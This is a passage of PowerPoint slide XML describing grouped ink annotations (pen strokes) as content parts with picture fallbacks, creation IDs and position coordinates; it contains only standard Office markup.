                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C94DD6-FC62-7280-69D2-50B32D2FC15A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId64"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3840412" y="6740172"/>
                  <a:ext cx="4165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9" name="Ink 68">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93C6B70-E4DB-46B6-9EA2-BE27BB134B05}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4008892" y="6802452"/>
                <a:ext cx="207360" cy="12600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="69" name="Ink 68">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D93C6B70-E4DB-46B6-9EA2-BE27BB134B05}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId66"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3972892" y="6766812"/>
                  <a:ext cx="2790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0" name="Ink 69">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E13CC4-87C1-AAC7-9110-CECA6FA08582}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4196452" y="6783732"/>
                <a:ext cx="360" cy="360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="70" name="Ink 69">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E13CC4-87C1-AAC7-9110-CECA6FA08582}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId42"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4160452" y="6747732"/>
                  <a:ext cx="72000" cy="72000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="Group 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F84F3AB-A1B2-612A-A6CE-F016F600B8C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2399332" y="4576572"/>
            <a:ext cx="1311840" cy="558360"/>
            <a:chOff x="2399332" y="4576572"/>
            <a:chExt cx="1311840" cy="558360"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId68">
              <p14:nvContentPartPr>
                <p14:cNvPr id="21" name="Ink 20">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECAE224-7583-EDA9-A46B-B14C932298FA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2399332" y="4673412"/>
                <a:ext cx="258840" cy="284040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="21" name="Ink 20">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECAE224-7583-EDA9-A46B-B14C932298FA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId69"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2363692" y="4637412"/>
                  <a:ext cx="33048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A33297D3-6859-B663-7100-3BF9BEDAB021}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2836372" y="4697172"/>
                <a:ext cx="32040" cy="271800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="22" name="Ink 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33297D3-6859-B663-7100-3BF9BEDAB021}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId71"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2800372" y="4661172"/>
                  <a:ext cx="1036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 name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A248632-67F1-1141-08E0-638383FF2037}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2868052" y="4704732"/>
                <a:ext cx="208440" cy="182880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A248632-67F1-1141-08E0-638383FF2037}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId73"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2832052" y="4669092"/>
                  <a:ext cx="2800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 name="Ink 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD1D0C5A-38DD-F08B-89F8-BDAC7035ACF6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3141652" y="4697172"/>
                <a:ext cx="55080" cy="138240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="24" name="Ink 23">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD1D0C5A-38DD-F08B-89F8-BDAC7035ACF6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId75"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3105652" y="4661172"/>
                  <a:ext cx="1267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 name="Ink 24">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31055DBF-6D03-1D68-C250-DA021CD8DEFD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3196012" y="4610412"/>
                <a:ext cx="212760" cy="280080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="25" name="Ink 24">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31055DBF-6D03-1D68-C250-DA021CD8DEFD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId77"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3160372" y="4574772"/>
                  <a:ext cx="2844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 name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A846F06D-4C9B-50F8-7CA0-25030C88B8AB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3462052" y="4576572"/>
                <a:ext cx="169560" cy="34560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="26" name="Ink 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A846F06D-4C9B-50F8-7CA0-25030C88B8AB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId79"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3426052" y="4540932"/>
                  <a:ext cx="2412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7" name="Ink 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994A038C-4AB0-2098-5537-71A794A3D6F6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3586612" y="4618692"/>
                <a:ext cx="61920" cy="189360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="27" name="Ink 26">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994A038C-4AB0-2098-5537-71A794A3D6F6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId81"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3550972" y="4583052"/>
                  <a:ext cx="1335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8" name="Ink 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A6A791-283C-FACF-E842-E89A63F99F9E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3571132" y="4883292"/>
                <a:ext cx="140040" cy="1800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="28" name="Ink 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A6A791-283C-FACF-E842-E89A63F99F9E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId83"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3535492" y="4847292"/>
                  <a:ext cx="2116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2" name="Ink 71">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EB6694-3FBD-0646-4832-225519BC48A8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2946172" y="5099652"/>
                <a:ext cx="280800" cy="35280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="72" name="Ink 71">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EB6694-3FBD-0646-4832-225519BC48A8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId85"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2910172" y="5063652"/>
                  <a:ext cx="352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3" name="Ink 72">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD17A1C-DD0C-AF71-32DB-4E2DF141FC42}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3172972" y="5103252"/>
                <a:ext cx="360" cy="1800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="73" name="Ink 72">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FD17A1C-DD0C-AF71-32DB-4E2DF141FC42}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId87"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3136972" y="5067252"/>
                  <a:ext cx="7200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78" name="Ink 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3411935-B007-1B0E-CCF3-CE3A1A5B8AEF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2657092" y="4501332"/>
              <a:ext cx="354240" cy="492840"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="78" name="Ink 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3411935-B007-1B0E-CCF3-CE3A1A5B8AEF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId89"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2621092" y="4465332"/>
                <a:ext cx="42588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9FF296D7-F33F-DF91-FD74-A43A51D6B3F7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3015652" y="4548132"/>
              <a:ext cx="46800" cy="323280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="79" name="Ink 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF296D7-F33F-DF91-FD74-A43A51D6B3F7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId91"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2979652" y="4512492"/>
                <a:ext cx="11844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499545EF-6146-1582-2A6F-395102333167}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3039772" y="4531212"/>
              <a:ext cx="259920" cy="343800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="80" name="Ink 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499545EF-6146-1582-2A6F-395102333167}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId93"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3004132" y="4495572"/>
                <a:ext cx="3315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1" name="Ink 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726BF0C4-706A-7735-7166-D281CB377CE3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3641692" y="4594932"/>
              <a:ext cx="188280" cy="358200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="81" name="Ink 80">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726BF0C4-706A-7735-7166-D281CB377CE3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId95"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3605692" y="4559292"/>
                <a:ext cx="25992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2" name="Ink 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B63E962C-3AAB-960D-14C7-F0521EA36E6D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3665092" y="4563972"/>
              <a:ext cx="102600" cy="286920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="82" name="Ink 81">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B63E962C-3AAB-960D-14C7-F0521EA36E6D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId97"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3629092" y="4528332"/>
                <a:ext cx="17424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3" name="Ink 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011BED25-9107-1448-4BB8-5AC1577C96E1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3680572" y="4650012"/>
              <a:ext cx="89280" cy="239040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="83" name="Ink 82">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011BED25-9107-1448-4BB8-5AC1577C96E1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId99"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3644572" y="4614372"/>
                <a:ext cx="1609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4" name="Ink 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B11BEF5-7EFE-422F-E03B-B7D46D8CED69}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3633772" y="4751532"/>
              <a:ext cx="98280" cy="70920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="84" name="Ink 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B11BEF5-7EFE-422F-E03B-B7D46D8CED69}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId101"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3597772" y="4715892"/>
                <a:ext cx="169920" cy="142560"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93" name="Group 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6020006-E308-0C91-111C-AF96D9699D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4639252" y="992412"/>
            <a:ext cx="4228920" cy="4072680"/>
            <a:chOff x="4639252" y="992412"/>
            <a:chExt cx="4228920" cy="4072680"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId102">
              <p14:nvContentPartPr>
                <p14:cNvPr id="35" name="Ink 34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32B0593C-E303-46D9-7D7A-822861CB8135}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6704932" y="2743092"/>
                <a:ext cx="56160" cy="1760400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="35" name="Ink 34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32B0593C-E303-46D9-7D7A-822861CB8135}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId103"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6669292" y="2707092"/>
                  <a:ext cx="127800" cy="1832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6" name="Ink 35">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C08223-FAC4-D0AA-1B91-A30EE84075A2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6869092" y="2453292"/>
                <a:ext cx="1949040" cy="2205360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="36" name="Ink 35">
